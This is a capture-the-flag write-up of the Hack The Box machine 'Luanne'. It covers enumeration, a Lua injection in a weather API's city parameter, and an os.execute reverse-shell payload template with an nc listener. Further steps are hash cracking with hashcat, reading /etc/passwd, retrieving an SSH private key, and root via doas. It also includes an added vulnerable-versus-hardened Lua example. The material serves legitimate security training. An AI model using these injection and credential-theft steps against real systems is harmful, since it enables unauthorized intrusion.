Luanne Hackthebox writeup.

cyberbandit
5 min read · May 4, 2021

Luanne.

The newly deployed HackTheBox machine "Luanne" was an easy and enjoyable box.
It runs NetBSD, and the path to root goes through a Lua injection and some hash cracking. So, let's start.
Assuming you have done the basics (connected to the VPN and set up your working directories), we begin,
as usual, with an nmap scan:
$ nmap -sC -sV -oA nmap/nmap.scan 10.10.10.218

This gives us the open ports, the services behind them and their versions. Port 22 is open with SSH, but nothing interesting turns up for that version. Port 80 is open with an nginx web server, and the default scripts also pulled a robots.txt with one disallowed entry: /weather (probably a directory).
Opening the website prompts us for HTTP authentication. I tried a few injections in the login form, but that turned out to be a waste of time.

So, going back to the nmap result, robots.txt caught my eye: it tells crawlers not to index /weather. I spent an hour looking for a way to "bypass" the blocking before realizing I am a nincompoop. A Disallow line in robots.txt is advice to well-behaved crawlers, not an access control; the directory can simply be requested directly.

After that, I ran gobuster to see what I could find inside the /weather/ directory.
$ gobuster dir -u http://10.10.10.218/weather/ -w /opt/SecLists-master/Discovery/Web-Content/raft-small-directories.txt

To my surprise, it found an endpoint named "forecast". Without wasting a second, I opened /weather/forecast, and it returned some JSON.

Reading the JSON, I noticed that city= is a parameter. As the response itself suggested, I supplied ?city=list, which returned the list of cities the API knows about.

Then I tried ?city=London and ?city=Manchester one by one; nothing interesting there. So I injected a single quote into the parameter (?city='). That produced an error in the Raw Data tab, which showed that Lua is running on the backend.

Ergo, I searched for ways to exploit Lua injection. Interesting! There are several.

So, I tried ?city='); print("Helloworld") --

Notes

· ') closes the string literal and the function call that the parameter lands in.

· ; ends that statement so a new one can follow.

· print("Helloworld") is the new statement; it prints hello world in the response.

· -- starts a Lua comment, so the rest of the original line is ignored.

So I looked for something that gives RCE, and luckily Lua's os.execute() runs system commands for us. With that in hand, I cat /etc/passwd (probably everyone does that). Note that r.michaels is the user.
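As an added example (not the page's code, and not the box's real source, which the writeup never shows), here is a forecast handler written the way the leaked error suggests the backend works, beside a version that never compiles user input. The names FORECASTS, lookup, vulnerable_forecast and safe_forecast and the sample data are my own constructions; it needs Lua 5.2 or later because it passes an explicit environment to load.

```lua
-- Added example, not the page's code and not the box's real source.
-- Models a forecast handler the way the leaked error suggests it works,
-- next to one that never compiles user input. Names and data are
-- constructed. Requires Lua 5.2+ (load with an explicit environment).

-- Constructed stand-in for the real forecast data.
local FORECASTS = {
  London     = { temp = 12, sky = "cloudy" },
  Manchester = { temp = 10, sky = "rain" },
}

local function lookup(city)
  return FORECASTS[city]
end

-- VULNERABLE: the query parameter becomes part of Lua source text.
--   ?city=London                 -> result = lookup('London')
--   ?city='                      -> result = lookup(''')   (syntax error whose
--                                   text reveals the Lua interpreter)
--   ?city=');os.execute("id")--  -> result = lookup('');os.execute("id")--')
local function vulnerable_forecast(city)
  -- A restricted environment is no defence while it still exposes os/io.
  local env = { lookup = lookup, os = os, print = print }
  local src = "result = lookup('" .. city .. "')"
  local chunk, err = load(src, "forecast", "t", env)
  if not chunk then
    return nil, err   -- the kind of message that showed up in the Raw Data tab
  end
  chunk()
  return env.result
end

-- HARDENED: the parameter is data only. It is checked against a
-- conservative pattern and then used as a table key; there is no load()
-- and no string building, so there is nothing to break out of.
local function safe_forecast(city)
  if type(city) ~= "string" or not city:match("^[%a%s%-]+$") then
    return nil, "invalid city"
  end
  local hit = lookup(city)
  if not hit then
    return nil, "unknown city"
  end
  return hit
end

-- Demonstration. The injected value mirrors the writeup's test payload;
-- swap print for os.execute and the same mechanism runs a shell command
-- as the web server user.
print(vulnerable_forecast("London").sky)                       -- cloudy
print(select(2, vulnerable_forecast("'")))                     -- syntax error text
vulnerable_forecast("'); print('Helloworld') --")              -- prints Helloworld
print(select(2, safe_forecast("'); print('Helloworld') --")))  -- invalid city
print(safe_forecast("London").temp)                            -- 12
```

The fix is not to escape quotes better; it is to stop turning request data into source code at all. Dropping os and io from the chunk's environment only limits the blast radius of the same bug.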

Then I tried to run nc to get a reverse shell, but surprisingly it didn't work. So I searched a cheat sheet for other nc reverse-shell forms. I found this:

Then I URL-encoded it.

After this, I opened an nc listener:

$ nc -lnvp 1234

Subsequently, I fired our payload:

>> ?city=');os.execute("<URL-encoded command here>")--

Voila, I got a shell.

After some directory traversal, I found a hidden file, .htpasswd.

Seemingly, a Unix crypt-style hash is stored there. Let's crack it with hashcat; mode 500 is md5crypt, the $1$ format. Note that --show only prints entries already cracked into the potfile, so run the attack first and then ask for the result:
$ hashcat -m 500 -a 0 -o <output file> <hash-stored-file> <wordlist>
$ hashcat -m 500 <hash-stored-file> --show

I then checked whether any service was listening only locally. Running netstat -an showed the following.

Port 3001 looked interesting, so I curled it, and it returned an authentication error.
So, I supplied the username webapi_user from .htpasswd and the password we cracked:
$ curl -u webapi_user:iamthebest http://localhost:3001/~r.michaels/
Note: /~user/ is the web server's per-user directory convention on NetBSD; it maps to a directory inside that user's home, which is why r.michaels's files are served from here.

We can see id_rsa listed. I curled again to fetch id_rsa. Boom, we got it.

I copied it into a file, set its permissions to 600 (ssh refuses a private key that others can read) and used it to log in:

$ chmod 600 id_rsa
$ ssh -i id_rsa r.michaels@10.10.10.218

Boom, we got user.

Root (privilege escalation)

For root, I looked around the home directory, and the backups folder stood out.

Inside it I found an encrypted archive. So I used netpgp (the BSD PGP encryption, decryption and signature verification tool) to decrypt it:

$ netpgp --decrypt <file> --output=/tmp/devel.tar.gz

So I decompressed and extracted the tarball.

Then I checked the .htpasswd file inside the backup. Again, a hash, but not the same one as before.

So I cracked it again with hashcat, the same way as before.

This time the password is littlebear.
Then I tried to switch to root. For that I needed a way to run commands as the superuser, i.e. sudo (as we call it on Linux). After an eternity of research, I found that doas is the sudo equivalent on BSD, so I used it; doas prompts for the invoking user's password, and the cracked password littlebear worked here.

Voila, we are root. Now I can cat root.txt.

Thank you for reading! Hope you liked it.
